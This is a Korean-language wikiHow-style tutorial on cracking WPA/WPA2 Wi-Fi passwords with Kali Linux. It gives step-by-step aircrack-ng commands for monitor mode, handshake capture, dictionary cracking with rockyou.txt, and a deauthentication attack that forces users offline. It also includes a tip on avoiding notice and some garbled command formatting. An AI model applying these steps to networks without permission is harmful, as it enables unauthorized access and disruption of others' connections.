PDF 다운로드 PDF 다운로드

이 위키하우는 칼리 리눅스로 와이파이를 해킹하여 WPA 또는 WPA2의 비밀번호를 찾는 방법을 알려줍니다.

파트 1
파트 1 의 4:

Wi-Fi 해킹 준비

PDF 다운로드
  1. 대부분 WPA 또는 WPA2 비밀번호를 해킹할 수 있는 경우는 네트워크를 본인이 소유하거나 네트워크 해킹에 대한 명시적 동의가 있는 경우에만 가능합니다.
    • 위의 기준을 충족하지 않는 해킹은 불법이며 연방 범죄로 간주될 수 있습니다.
  2. 칼리 리눅스는 WPA 및 WPA2를 해킹하는 데 자주 사용됩니다. 다음의 방법으로 칼리 리눅스 설치 이미지 (ISO)를 다운로드 할 수 있습니다.
    • 컴퓨터의 웹 브라우저에서 https://www.kali.org/downloads/에 접속하십시오.
    • 사용하려는 칼리 버전의 옆에 있는 HTTP 를 클릭하십시오.
    • 파일 다운로드가 완료될 때까지 기다립니다.
  3. 최소 4기가 공간이 있는 USB 드라이브를 사용해야 합니다.
  4. . USB 드라이브를 설치 위치로 사용해야 하기 때문입니다.
    • 또한 맥을 사용하여 이 절차를 진행해도 됩니다.
  5. USB 드라이브를 열고 칼리 리눅스 ISO 파일을 USB 드라이브 창으로 드래그하십시오.
    • 이 과정을 마친 후에도 USB 드라이브를 꽂아 두십시오.
  6. 컴퓨터에 칼리 리눅스를 설치하려면 다음을 따르십시오.
    • 윈도우 컴퓨터를 다시 시작하세요.
    • 바이오스 메뉴를 켜세요 .
    • "부팅 옵션"(또는 유사한) 섹션을 찾아 USB 드라이브 이름을 선택한 다음 목록의 맨 위로 이동하여 컴퓨터가 USB 드라이브로 부팅하도록 설정하십시오.
    • 저장하고 종료한 다음 칼리 리눅스 설치 창이 나타날 때까지 기다리세요(컴퓨터를 한 번 더 다시 시작해야 할 수도 있음).
    • 칼리 리눅스 설치 마법사를 따르세요.
  7. 온라인 또는 컴퓨터용품점에서 Wi-Fi 카드를 살 수 있습니다. Wi-Fi 카드가 모니터링(RFMON)을 허용하는지 확인하십시오. 그렇지 않으면 해킹할 수 없습니다.
    • 많은 컴퓨터에 내장 RFMON Wi-Fi 카드가 있으므로 부품을 따로 사기 전에 이하의 4단계를 시도해보십시오.
    • 가상 장치에서 칼리 리눅스를 사용하려는 경우 내장된 카드에 관계없이 Wi-Fi 카드를 사야 합니다.
  8. 로그인 할 때 루트 사용자 이름과 비밀번호를 입력하십시오.
    • 해킹을 하려면 항상 루트 상태여야 합니다.
  9. 카드가 즉시 드라이버 설치 및 다운로드를 스스로 진행합니다. 안내창이 표시되면 지시에 따라 설정을 완료하십시오. 이 단계를 마치면 네트워크 해킹을 계속할 수 있습니다.
    • 컴퓨터에 카드를 이미 설치했더라도 칼리 리눅스에도 장착하여 설치해야 합니다.
    • 대부분의 경우 카드를 컴퓨터에 연결하는 것만으로도 됩니다.
    광고
파트 2
파트 2 의 4:

Wi-Fi 해킹하기

PDF 다운로드
  1. 터미널 앱 아이콘을 찾아 클릭하십시오.이 아이콘은 흰색 ">_"가 있는 검은 창 모양입니다.
    • Alt + Ctrl + T 를 눌러도 터미널을 열 수 있습니다.
  2. 다음의 명령어를 입력한 다음 Enter 를 누르십시오.
    sudo apt-get install aircrack-ng
  3. 컴퓨터에 로그인할 때 사용한 비밀번호를 입력한 다음 Enter 를 누르십시오. 터미널에서 실행하는 모든 명령어에 루트 권한을 부여합니다.
    • 다른 터미널 창을 열면 sudo 접두사를 사용하여 명령을 실행하거나 패스워드를 다시 입력해야 할 수도 있습니다.
  4. 프롬프트가 표시되면 Y 버튼을 누르고 설치될 때까지 기다리십시오.
  5. 다음의 명령어를 입력한 후 Enter 를 누르십시오.
    airmon-ng
  6. "인터페이스" 열에서 찾을 수 있습니다.
    • 본인이 소유한 네트워크를 해킹하는 경우 일반적으로 "wlan0"이라는 이름입니다.
    • 모니터 이름이 보이지 않으면 Wi-Fi 카드가 모니터링을 지원하지 않는 것입니다.
  7. 다음 명령어를 입력하고 Enter 를 누르세요.
    airmon-ng start wlan0
    • 이름이 다른 경우 "wlan0" 대신 목적 네트워크의 이름으로 교체하세요.
  8. 다음의 명령을 입력하십시오.
    iwconfig
  9. 종종 Wi-Fi 카드가 컴퓨터에서 실행중인 프로세스와 충돌할 수 있습니다. 다음의 명령을 입력하면 문제가 되는 프로세스를 종료할 수 있습니다. [1]
    airmon-ng check kill 
    
  10. 대부분의 경우 "mon0" 또는 "wlan0mon" 같은 이름입니다. [2]
  11. 범위 내의 모든 라우터 목록을 얻으려면 다음의 명령을 입력하십시오.
    airodump-ng mon0
    • "mon0"를 이전 단계에서 사용했던 모니터 인터페이스의 이름으로 교체하십시오.
  12. 각 문자열의 끝에 이름이 보입니다. 해킹하려는 네트워크를 찾으십시오.
  13. 네트워크 이름 왼쪽에 "WPA" 또는 "WPA2"가 표시되어 있으면 해킹할 수 있습니다. 그렇지 않으면 해킹할 수 없습니다.
  14. 이 정보는 네트워크 이름의 왼쪽에 있습니다.
    • MAC 주소 — 라우터 줄의 맨 왼쪽에 있는 숫자열입니다.
    • 채널 — WPA 또는 WPA2 태그의 왼쪽에 있는 숫자 (예: 0, 1, 2-)입니다.
  15. "핸드셰이크"는 장치가 네트워크에 연결될 때 (예: 컴퓨터와 라우터의 연결)발생합니다. 다음 명령어를 입력하되, 명령어의 일부를 본인의 네트워크 정보로 교체하세요.
    airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0
    • "channel"을 마지막 단계에서 찾아낸 채널 번호로 교체합니다.
    • "MAC"를 마지막 단계에서 찾아낸 MAC 주소로 교체합니다.
    • "mon0"을 인터페이스 이름으로 교체합니다.
    • 예시 주소는 다음과 같습니다.
      airodump-ng -c 3 
      --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon
  16. 화면 오른쪽 상단에 "WPA handshake:" 태그와 MAC 주소가 표시된 줄이 나타나면 진행할 수 있습니다.
  17. Ctrl + C 를 눌러 종료한 다음 바탕 화면에 ".cap"파일이 있는지 확인하십시오.
  18. 필수인 것은 아니지만 작업하기가 더 쉬워집니다. 다음 명령을 입력하여 이름을 변경하되, "name"을 원하는 파일 이름으로 바꾸십시오.
    mv ./-01.cap name.cap
    • ".cap"파일의 이름이 "-01.cap"이 아닌 경우 "-01.cap"을 "원하는 이름으로 바꾸십시오.
  19. 칼리 리눅스의 변환기를 사용하면 됩니다. 다음 명령을 입력하되, "name"을 파일의 이름으로 바꾸십시오.
    cap2hccapx.bin name.cap name.hccapx
    • https://hashcat.net/cap2hccapx/에 접속하여 파일 선택 을 클릭하여 ".cap"파일을 변환기에 업로 할 수도 있습니다. 파일이 업로드되면 변환 을 클릭하여 변환한 다음 계속 진행하기 전에 바탕화면으로 다시 다운로드하십시오.
  20. 암호를 해독하는 데 사용할 것입니다. 다음 명령어를 순서대로 입력하십시오.
    sudo git clone https://github.com/brannondorsey/naive-hashcat cd 
    naive-hashcat
    curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
  21. 설치가 완료되면 이하의 명령을 입력하십시오.("name"을 모두 ".cap"파일의 이름으로 교체하세요).
     HASH_FILE 
     = 
    name.hccapx POT_FILE 
     = 
    name.pot HASH_TYPE 
     = 
     2500 
    ./naive-hashcat.sh
  22. 비밀번호를 알아내면 "naive-hashcat" 디렉토리에 있는 "name.pot" 파일에 기록됩니다. 문자열의 마지막 콜론 뒤에 있는 단어나 구가 비밀번호입니다.
    • 암호 해독에는 몇 시간에서 몇 달까지 걸릴 수 있습니다.
    광고
파트 3
파트 3 의 4:

GPU가 없는 컴퓨터에서 Aircrack-Ng 사용하기

PDF 다운로드
  1. 보편적으로 사용되는 사전 파일은 "Rock You"입니다. 다음 명령을 입력하여 다운로드하세요.
    curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    • 암호가 사전에 없으면 aircrack-ng가 WPA 또는 WPA2 암호를 해독할 수 없습니다.
  2. 다음의 명령을 입력하되, 네트워크 정보를 알맞게 고치십시오.
    aircrack-ng -a2 -b MAC -w rockyou.txt name.cap
    • WPA2 네트워크가 아닌 WPA 네트워크를 해킹하는 경우 "-a2"를 -a 로 바꾸십시오.
    • "MAC"를 마지막 단계에서 찾아낸 MAC 주소로 교체합니다.
    • "name"을 ".cap" 파일의 이름으로 교체하세요.
  3. "KEY FOUND!"가 보이면 aircrack-ng가 해독에 성공한 겁니다. "KEY FOUND!" 오른쪽 괄호 안에 비밀번호가 보입니다.
    광고
파트 4
파트 4 의 4:

인증 해제 공격을 사용하여 핸드셰이크 발동

PDF 다운로드
  1. 1
    인증 해제 공격이 뭔지 알아야 합니다. 인증 해제 공격은 침입하려는 라우터에 악의적인 인증 해제 패킷을 전송하여 인터넷 연결을 끊고 인터넷 사용자가 다시 로그인하도록 강제합니다. 사용자가 다시 로그인하면 핸드셰이크가 발생합니다.
  2. 다음의 명령을 입력하되, 네트워크 정보를 알맞게 고치십시오.
    airodump-ng -c channel --bssid MAC
    • 예를 들면 다음과 같습니다.
      airodump-ng -c 1 
      --bssid 9C:5C:8E:C9:AB:C0
  3. 두 개의 MAC 주소가 나란히 표시되고 제조업체 이름이 포함된 문자열이 표시되면 계속하면 됩니다.
    • 어떤 장치(예: 컴퓨터)가 네트워크에 연결했음을 나타냅니다.
  4. Alt + Ctrl + T 를 누르십시오. airodump-ng를 백그라운드 터미널 창에서 계속 돌려놔야 합니다.
  5. 다음 명령을 입력하되, 네트워크 정보를 교체하십시오. [3]
    aireplay-ng -0 2 
    -a MAC1 -c MAC2 mon0
    • "2"는 전송할 패킷 수를 나타냅니다. 이 수를 늘리고 줄일 수 있지만 두 개 이상의 패킷을 보내면 눈에 띌 수 있습니다.
    • "MAC1"을 백그라운드 터미널 창의 하단 왼쪽의 MAC 주소로 바꿉니다.
    • "MAC2"를 백그라운드 터미널 창의 하단 가장 오른쪽의 MAC 주소로 바꿉니다.
    • "mon0"을 컴퓨터가 처음 라우터를 찾을 때 기록한 인터페이스 이름으로 바꾸십시오.
    • 다음과 같이 입력하면 됩니다.
      aireplay-ng -0 3 
      -a 9C:5C:8E:C9:AB:C0 -c 64 
      :BC:0C:48:97:F7 mon0
  6. 인증 해제 패킷 전송이 완료되면 처음 연 터미널 창으로 돌아가세요.
  7. "WPA handshake:" 태그와 그 옆에 주소가 표시되면 네트워크를 해킹 할 수 있습니다.
    광고

  • 서버를 시작하기 전에 이 방법을 사용하여 자신의 Wi-Fi에서 약점을 테스트하면 유사한 공격에 대비할 수 있습니다.
광고

경고

  • 대부분의 국가에서 허가 없이 타인의 Wi-Fi에 접속하는 것은 불법입니다. 본인 소유이거나 테스트에 명시적으로 동의한 경우만 진행하십시오.
  • 인증 해제 패킷을 두 개 이상 보내면 대상 컴퓨터가 튕길 수 있기 때문에, 의심을 살 수 있습니다.
광고

이 위키하우에 대하여

이 문서는 45,512 번 조회 되었습니다.

이 글이 도움이 되었나요?

광고